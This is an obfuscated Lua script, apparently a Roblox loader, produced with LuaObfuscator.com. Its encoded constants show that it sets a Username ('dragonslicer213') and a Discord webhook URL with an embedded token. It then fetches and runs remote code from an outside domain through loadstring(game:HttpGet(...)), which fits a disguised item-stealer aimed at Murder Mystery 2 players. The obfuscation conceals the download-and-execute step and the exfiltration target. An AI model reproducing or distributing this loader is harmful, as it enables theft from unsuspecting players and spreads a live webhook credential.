--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v84=0;while true do if (v84==0) then v19=v0(v3(v30,1,1));return "";end end else local v85=v2(v0(v30,16));if v19 then local v92=0;local v93;while true do if (v92==1) then return v93;end if (v92==0) then v93=v5(v85,v19);v19=nil;v92=1;end end else return v85;end end end);local function v20(v31,v32,v33) if v33 then local v86=(v31/(((2 + 3) -3)^(v32-(2 -1))))%(((1 + 2) -1)^(((v33-((879 -(282 + 595)) -1)) -(v32-(1638 -(1523 + 114)))) + (620 -(555 + 58 + 6)))) ;return v86-(v86%(932 -(857 + 74))) ;else local v87=2^(v32-(569 -(367 + 201))) ;return (((v31%(v87 + v87))>=v87) and (1 -0)) or (927 -(214 + 713)) ;end end local function v21() local v34=(1182 -(32 + 85)) -(68 + 997) ;local v35;while true do if (v34==1) then return v35;end if (v34==(1270 -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=4 -(3 + 0) ;end end end local function v22() local v36=0;local v37;local v38;while true do if (v36==(1 + 0)) then return (v38 * (1213 -(892 + 65))) + v37 ;end if (v36==(0 -(180 -(67 + 113)))) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;v36=351 -(64 + 23 + 263) ;end end end local function v23() local v39=0 -(0 -0) ;local v40;local v41;local v42;local v43;while true do if (v39==(0 + 0)) then v40,v41,v42,v43=v1(v16,v18,v18 + (11 -8) );v18=v18 + (956 -(802 + 150)) ;v39=(1189 -(1069 + 118)) -1 ;end if (v39==(1 -0)) then return (v43 * (12211951 + 2659478 + 1905787)) + (v42 * (66533 -(915 + 82))) + (v41 * ((1642 -918) -468)) + v40 ;end end end local function v24() local v44=v23();local v45=v23();local v46=1 -(0 -0) ;local v47=(v20(v45,1 + 0 + 0 ,17 + 3 ) * (((9 -6) -(1424 -(630 + 793)))^(32 + 0))) + v44 ;local v48=v20(v45,87 -66 ,822 -(368 + 423) );local v49=((v20(v45,100 -(1815 -(760 + 987)) )==(3 -2)) and  -((1916 -(1789 + 124)) -2)) or (19 -(10 + 8)) ;if (v48==(0 -0)) then if (v47==(0 -0)) then return v49 * (442 -(416 + 26)) ;else v48=1 + 0 ;v46=0 -0 ;end elseif (v48==(879 + 1168)) then return ((v47==0) and (v49 * ((1 -0)/(438 -(145 + 293))))) or (v49 * NaN) ;end return v8(v49,v48-(1453 -(44 + 386)) ) * (v46 + (v47/(((4094 -2606) -(998 + 488))^(17 + 35)))) ;end local function v25(v50) local v51;if  not v50 then local v88=0 -0 ;while true do if (v88==(0 + 0)) then v50=v23();if (v50==0) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;local v52={};for v67=1 + (1055 -(87 + 968)) , #v51 do v52[v67]=v2(v1(v3(v51,v67,v67)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 403 -(320 + 83) ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do local v69=(function() return 1878 -(332 + 1546) ;end)();while true do if (v69~=0) then else if (v53==(1385 -(746 + 638))) then v57=(function() return {};end)();v58=(function() return {v55,v56,nil,v57};end)();v59=(function() return v23();end)();v53=(function() return 2;end)();end if (v53==3) then for v100= #"~",v23() do local v101=(function() return v21();end)();if (v20(v101, #" ", #":")==0) then local v103=(function() return 0;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if ((0 + 0)~=v103) then else local v142=(function() return 0 -0 ;end)();while true do if (v142~=1) then else v103=(function() return 342 -(218 + 123) ;end)();break;end if (v142~=(1581 -(1535 + 46))) then else v104=(function() return 0 + 0 ;end)();v105=(function() return nil;end)();v142=(function() return 1;end)();end end end if (v103==1) then local v143=(function() return 0 + 0 ;end)();while true do if ((561 -(306 + 254))~=v143) then else v103=(function() return 2;end)();break;end if (v143==(0 + 0)) then v106=(function() return nil;end)();v107=(function() return nil;end)();v143=(function() return 1 -0 ;end)();end end end if (v103==(1469 -(899 + 568))) then while true do if (v104== #"[") then local v168=(function() return 0;end)();while true do if ((0 + 0)~=v168) then else v107=(function() return {v22(),v22(),nil,nil};end)();if (v105==(0 -0)) then local v183=(function() return 603 -(268 + 335) ;end)();while true do if (v183~=(290 -(60 + 230))) then else v107[ #"asd"]=(function() return v22();end)();v107[ #"0836"]=(function() return v22();end)();break;end end elseif (v105== #"/") then v107[ #"-19"]=(function() return v23();end)();elseif (v105==(574 -(426 + 146))) then v107[ #"-19"]=(function() return v23() -(2^16) ;end)();elseif (v105== #"gha") then local v191=(function() return 0;end)();local v192=(function() return;end)();while true do if (v191==0) then v192=(function() return 0;end)();while true do if (v192~=0) then else v107[ #"asd"]=(function() return v23() -((1 + 1)^16) ;end)();v107[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v168=(function() return 1;end)();end if (v168~=(1457 -(282 + 1174))) then else v104=(function() return 813 -(569 + 242) ;end)();break;end end end if ( #"91("==v104) then if (v20(v106, #"91(", #"19(")~= #"/") then else v107[ #"0313"]=(function() return v60[v107[ #"xnxx"]];end)();end v55[v100]=(function() return v107;end)();break;end if (v104==(0 -0)) then local v170=(function() return 0 + 0 ;end)();local v171=(function() return;end)();while true do if (v170==(1024 -(706 + 318))) then v171=(function() return 0;end)();while true do if (v171~=(1251 -(721 + 530))) then else v105=(function() return v20(v101,1273 -(945 + 326) , #"91(");end)();v106=(function() return v20(v101, #"asd1",6);end)();v171=(function() return 2 -1 ;end)();end if (v171~=1) then else v104=(function() return  #" ";end)();break;end end break;end end end if (v104==(2 + 0)) then local v172=(function() return 700 -(271 + 429) ;end)();while true do if (v172==(1 + 0)) then v104=(function() return  #"nil";end)();break;end if (v172==(1500 -(1408 + 92))) then if (v20(v106, #"[", #"}")~= #".") then else v107[2]=(function() return v60[v107[1088 -(461 + 625) ]];end)();end if (v20(v106,1290 -(993 + 295) ,1 + 1 )== #",") then v107[ #"xnx"]=(function() return v60[v107[ #"gha"]];end)();end v172=(function() return 1172 -(418 + 753) ;end)();end end end end break;end end end end for v102= #">",v23() do v56,v102,v28=(function() return v54(v56,v102,v28);end)();end return v58;end v69=(function() return 1 + 0 ;end)();end if (v69==(1 + 0)) then if ((0 + 0)==v53) then local v98=(function() return 0 + 0 ;end)();while true do if (1~=v98) then else v56=(function() return {};end)();v53=(function() return 1;end)();break;end if ((529 -(406 + 123))==v98) then v54=(function() return function(v134,v135,v136) local v137=(function() return 0;end)();local v138=(function() return;end)();while true do if (v137==(1769 -(1749 + 20))) then v138=(function() return 0;end)();while true do if (v138==0) then local v181=(function() return 0 + 0 ;end)();local v182=(function() return;end)();while true do if (v181~=0) then else v182=(function() return 1322 -(1249 + 73) ;end)();while true do if (v182~=0) then else v134[v135-#"]" ]=(function() return v136();end)();return v134,v135,v136;end end break;end end end end break;end end end;end)();v55=(function() return {};end)();v98=(function() return 1 + 0 ;end)();end end end if (v53~=(1147 -(466 + 679))) then else local v99=(function() return 0 -0 ;end)();while true do if (v99~=(2 -1)) then else v58[ #"xnx"]=(function() return v21();end)();v53=(function() return 3;end)();break;end if (v99==0) then v60=(function() return {};end)();for v109= #",",v59 do local v110=(function() return 1900 -(106 + 1794) ;end)();local v111=(function() return;end)();local v112=(function() return;end)();local v113=(function() return;end)();while true do if (v110~=(0 + 0)) then else v111=(function() return 0 + 0 ;end)();v112=(function() return nil;end)();v110=(function() return 1;end)();end if (1~=v110) then else v113=(function() return nil;end)();while true do if ((0 -0)==v111) then local v178=(function() return 0;end)();while true do if (v178==(2 -1)) then v111=(function() return 1;end)();break;end if ((114 -(4 + 110))~=v178) then else v112=(function() return v21();end)();v113=(function() return nil;end)();v178=(function() return 585 -(57 + 527) ;end)();end end end if (v111==(1428 -(41 + 1386))) then if (v112== #":") then v113=(function() return v21()~=(103 -(17 + 86)) ;end)();elseif (v112==(2 + 0)) then v113=(function() return v24();end)();elseif (v112== #"-19") then v113=(function() return v25();end)();end v60[v109]=(function() return v113;end)();break;end end break;end end end v99=(function() return 1 -0 ;end)();end end end break;end end end end local function v29(v61,v62,v63) local v64=v61[2 -1 ];local v65=v61[168 -(122 + 44) ];local v66=v61[5 -2 ];return function(...) local v70=v64;local v71=v65;local v72=v66;local v73=v27;local v74=(4 -1) -2 ;local v75= -(1 + 0);local v76={};local v77={...};local v78=v12("#",...) -(1 + 0) ;local v79={};local v80={};for v89=0 -(0 -0) ,v78 do if (v89>=v72) then v76[v89-v72 ]=v77[v89 + 1 ];else v80[v89]=v77[v89 + 1 + 0 ];end end local v81=(v78-v72) + (66 -(30 + 35)) ;local v82;local v83;while true do v82=v70[v74];v83=v82[1 + 0 ];if (v83<=(1266 -((2547 -(363 + 1141)) + 214))) then if (v83<=4) then if (v83<=(3 -2)) then if (v83==0) then if (v80[v82[1214 -(323 + 889) ]]==v82[10 -(1586 -(1183 + 397)) ]) then v74=v74 + (305 -(244 + 60)) ;else v74=v82[583 -(361 + (666 -447)) ];end else local v114=v82[322 -(53 + 267) ];v80[v114]=v80[v114](v13(v80,v114 + 1 ,v75));end elseif ((v83<=(1 + 0 + 1)) or (164>=2785)) then local v116=(889 -(41 + 435)) -(15 + 398) ;local v117;while true do if ((v116==(982 -(18 + 964))) or (846>=2368)) then v117=v82[7 -5 ];v80[v117]=v80[v117](v13(v80,v117 + 1 + (1001 -(938 + 63)) ,v75));break;end end elseif ((v83==(2 + 1)) or (4012<=3358)) then do return;end else do return;end end elseif (v83<=(856 -(20 + 639 + 191))) then if (v83>(4 + 1)) then v74=v82[129 -(116 + 10) ];else v80[v82[2]]();end elseif ((1494<=3005) and (v83<=(1 + 6))) then v63[v82[(544 + 197) -(542 + 196) ]]=v80[v82[3 -1 ]];elseif ((v83>(3 + 5)) or (525==2109)) then v80[v82[2 + 0 ]]();else local v145=(1125 -(936 + 189)) + 0 ;local v146;local v147;while true do if ((33==33) and (v145==(0 + 0))) then v146=v82[4 -2 ];v147=v80[v82[(1982 -(1913 + 62)) -4 ]];v145=1 + 0 ;end if (v145==(1552 -(1126 + (1125 -700)))) then v80[v146 + 1 ]=v147;v80[v146]=v147[v82[409 -((2051 -(565 + 1368)) + 287) ]];break;end end end elseif (v83<=(54 -40)) then if (v83<=(1132 -(118 + 1003))) then if (((3054<=4015) and (v83==(29 -(71 -52)))) or (3111==2134)) then v80[v82[379 -(142 + 235) ]]=v82[(1674 -(1477 + 184)) -10 ];else v80[v82[(1614 -(1565 + 48)) + 1 ]]=v82[3];end elseif (v83<=(989 -(553 + 424))) then local v125=v82[(2 + 1) -1 ];local v126,v127=v73(v80[v125](v13(v80,v125 + 1 + 0 ,v82[3])));v75=(v127 + v125) -(1 + 0) ;local v128=0 + 0 ;for v139=v125,v75 do v128=v128 + 1 + 0 ;v80[v139]=v126[v128];end elseif (v83>13) then local v148=v82[2];local v149,v150=v73(v80[v148](v13(v80,v148 + 1 + 0 ,v82[(1144 -(782 + 356)) -3 ])));v75=(v150 + v148) -1 ;local v151=0 -0 ;for v160=v148,v75 do v151=v151 + (2 -1) ;v80[v160]=v149[v151];end else v74=v82[3];end elseif ((2355==2355) and (v83<=(5 + (278 -(176 + 91))))) then if ((1871<3382) and (v83>(72 -57))) then v63[v82[756 -(239 + 514) ]]=v80[v82[(1 -0) + 1 ]];else local v131=1329 -((2076 -1279) + 532) ;local v132;local v133;while true do if ((v131==0) or (588<=432)) then v132=v82[2];v133=v80[v82[3 + 0 ]];v131=1 + 0 ;end if ((4797>=3895) and (1293<=2166) and (v131==(2 -1))) then v80[v132 + (1203 -((549 -176) + 773 + 56)) ]=v133;v80[v132]=v133[v82[735 -(476 + 255) ]];break;end end end elseif ((v83<=(1147 -(369 + 761))) or (2579<123)) then if (v80[v82[2 + 0 ]]==v82[(862 -(564 + 292)) -2 ]) then v74=v74 + (1 -0) ;else v74=v82[241 -(64 + 174) ];end elseif (v83==(3 + 15)) then v80[v82[2 -0 ]]=v63[v82[(2214 -(157 + 1718)) -(117 + 27 + 192) ]];else v80[v82[218 -(42 + 174) ]]=v63[v82[3 + 0 ]];end v74=v74 + (3 -2) + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031B3O00682O7470733A2O2F65676F72696B7573612E73706163652F2O6D3203083O00557365726E616D65030F3O00647261676F6E736C6963657232313303073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31323639313839343234362O383932363734312F72666176536B48637A324D6E4244392D734561476572756977326576793335634A6750674636322O546A39424534585149424A617164424D383979717A645877654A724800143O00120B3O00013O00264O000B0001000200040D3O000B0001001213000100033O001213000200043O00200F00020002000500120B000400064O000E000200044O000200013O00022O000900010001000100040D3O0013000100264O00010001000100040D3O0001000100120B000100083O001207000100073O00120B0001000A3O001207000100093O00120B3O00023O00040D3O000100012O00043O00017O00",v9(),...);
